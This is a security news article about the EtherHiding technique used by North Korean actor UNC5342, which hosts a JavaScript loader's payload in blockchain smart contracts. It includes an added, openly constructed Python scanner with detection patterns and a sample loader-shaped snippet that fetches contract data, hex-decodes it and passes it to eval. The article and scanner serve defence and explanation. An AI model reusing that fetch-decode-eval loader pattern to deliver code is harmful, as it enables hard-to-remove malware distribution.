North Korean threat actor UNC5342 is using a new technique to spread malware via public blockchains: EtherHiding. Researchers at Google Threat Intelligence discovered that the group has been using this method since early 2025 in a social engineering campaign targeting developers in the crypto and technology sector.

EtherHiding uses smart contracts on blockchains such as Ethereum and BNB Smart Chain to hide and spread malicious code. This approach gives attackers a virtually indestructible infrastructure, because data on the blockchain is decentralized, transparent, and immutable. In the context of cybercrime, EtherHiding is considered a form of bulletproof hosting: infrastructure that is immune to legal or technical takedown.

In the campaign, UNC5342 approaches victims via fake job advertisements. The attackers pose as recruiters from well-known technology companies and convince targets to perform test assignments or download files. These files contain the JADESNOW malware, a JavaScript loader.

The loader connects to a smart contract on the blockchain that holds an encrypted payload; once decrypted, this payload initiates the second phase of the infection. Ultimately, the INVISIBLEFERRET backdoor is executed, giving the attackers long-term access to the system and enabling them to steal data or cryptocurrency.

Blockchain offers protection to actors

According to Google researchers, in addition to UNC5342, financially motivated actors such as UNC5142 also use EtherHiding to spread malware. The advantages of this technique are considerable: the decentralized nature of blockchains prevents smart contracts from being deleted, immutability protects against modification, transactions remain pseudonymous, and retrieving the malware leaves no traces in log files.
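Because a read-only contract call leaves nothing on the chain for a defender to inspect, detection of this chain has to happen where the loader runs: in the JavaScript that reads the contract, decodes the result and executes it. The following Python scanner is an added example illustrating that defender's view; it is not code from the Google Threat Intelligence report or from the UNC5342 campaign. The indicator patterns, the scoring rules and the three sample snippets are constructed for illustration and are not published signatures.

```python
"""Heuristic scanner for EtherHiding-style JavaScript loaders.

Added example (not from the Google report or the campaign it describes).
It flags scripts that combine the three steps the article describes:
a read-only call to a smart contract via a public RPC endpoint, decoding
of the returned hex, and execution of the decoded result. All patterns,
weights and sample snippets below are constructed, not real signatures.
"""
import re
from dataclasses import dataclass, field

# Indicator categories. Any single hit is common in legitimate dapps;
# the verdict depends on which categories co-occur.
INDICATORS = {
    # read-only contract calls never create an on-chain transaction
    "rpc_read_call": re.compile(r"\beth_call\b|\bgetStorageAt\b|\.methods\.\w+\([^)]*\)\.call\b"),
    # 20-byte hex contract address
    "contract_address": re.compile(r"0x[0-9a-fA-F]{40}\b"),
    # public RPC / provider URL (hostnames chosen for the example)
    "rpc_endpoint": re.compile(r"https?://[^\s'\"]*(?:bsc-dataseed|binance\.org|infura\.io|alchemy\.com|ankr\.com|publicnode\.com)[^\s'\"]*"),
    # turning returned hex into text
    "hex_decode": re.compile(r"\bhexToUtf8\b|\bhexToAscii\b|\bfromCharCode\b|\bparseInt\([^,]+,\s*16\)|\batob\b"),
    # executing or injecting what was retrieved
    "exec_sink": re.compile(r"\beval\s*\(|new\s+Function\s*\(|\.innerHTML\s*=|document\.write\s*\(|\bappendChild\s*\("),
}


@dataclass
class ScanResult:
    categories: dict = field(default_factory=dict)  # category -> matched text
    score: int = 0                                   # number of categories hit
    verdict: str = "benign"


def scan_js(source: str) -> ScanResult:
    """Return the indicator categories found in a JavaScript source string."""
    result = ScanResult()
    for name, pattern in INDICATORS.items():
        hits = [m.group(0) for m in pattern.finditer(source)]
        if hits:
            result.categories[name] = hits
    cats = set(result.categories)
    result.score = len(cats)
    # The full read-call -> decode -> execute chain is the EtherHiding shape.
    if {"rpc_read_call", "hex_decode", "exec_sink"} <= cats:
        result.verdict = "likely-etherhiding-loader"
    # An execution sink tied to a contract address or chain read is worth a look.
    elif "exec_sink" in cats and cats & {"rpc_read_call", "contract_address"}:
        result.verdict = "suspicious"
    return result


# Constructed samples (hypothetical; zero-value/repeating addresses, no real code).
SAMPLE_BENIGN_DAPP = """
// constructed: a wallet balance widget reading a token contract
const provider = new ethers.JsonRpcProvider("https://bsc-dataseed.binance.org/");
const token = new ethers.Contract("0xcafebabecafebabecafebabecafebabecafebabe", abi, provider);
const bal = await token.balanceOf(user);
document.getElementById("bal").textContent = ethers.formatUnits(bal, 18);
"""

SAMPLE_SUSPICIOUS = """
// constructed: inline script that evaluates something keyed by a contract address
var a = "0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef";
eval(window.cfg[a]);
"""

SAMPLE_LOADER_LIKE = """
// constructed fragment shaped like the article's description, not real malware
var r = await fetch("https://bsc-dataseed.binance.org/", {method: "POST",
  body: JSON.stringify({jsonrpc: "2.0", id: 1, method: "eth_call",
  params: [{to: "0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef", data: "0x..."}, "latest"]})});
var j = await r.json();
var s = web3.utils.hexToUtf8(j.result);
eval(s);
"""


def scan_samples() -> dict:
    """Scan the constructed samples and return name -> verdict."""
    samples = {
        "benign_dapp": SAMPLE_BENIGN_DAPP,
        "suspicious": SAMPLE_SUSPICIOUS,
        "loader_like": SAMPLE_LOADER_LIKE,
    }
    return {name: scan_js(src).verdict for name, src in samples.items()}


if __name__ == "__main__":
    for name, verdict in scan_samples().items():
        print(f"{name:12s} -> {verdict}")
```

The point of the three samples is the false-positive trap: a legitimate dapp also talks to contracts over a public RPC, so a contract address or an RPC hostname alone proves nothing. The scanner only escalates when the retrieved data reaches an execution sink, and only calls it a likely loader when the whole read-decode-execute chain is present in one script.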

Furthermore, attackers can update their malicious code at any time. Creating or modifying a smart contract typically costs less than two dollars, making EtherHiding a cheap and efficient method.

The application of EtherHiding illustrates how blockchain technology, originally intended for transparency and decentralization, is being misused as a permanent command-and-control mechanism. North Korea’s growing cyber capabilities underpin this shift. According to blockchain analysis company Elliptic, the country has stolen more than $2 billion in cryptocurrency in 2025. EtherHiding thus marks a new chapter in the convergence of state cyber operations, financial motives, and Web3 infrastructure.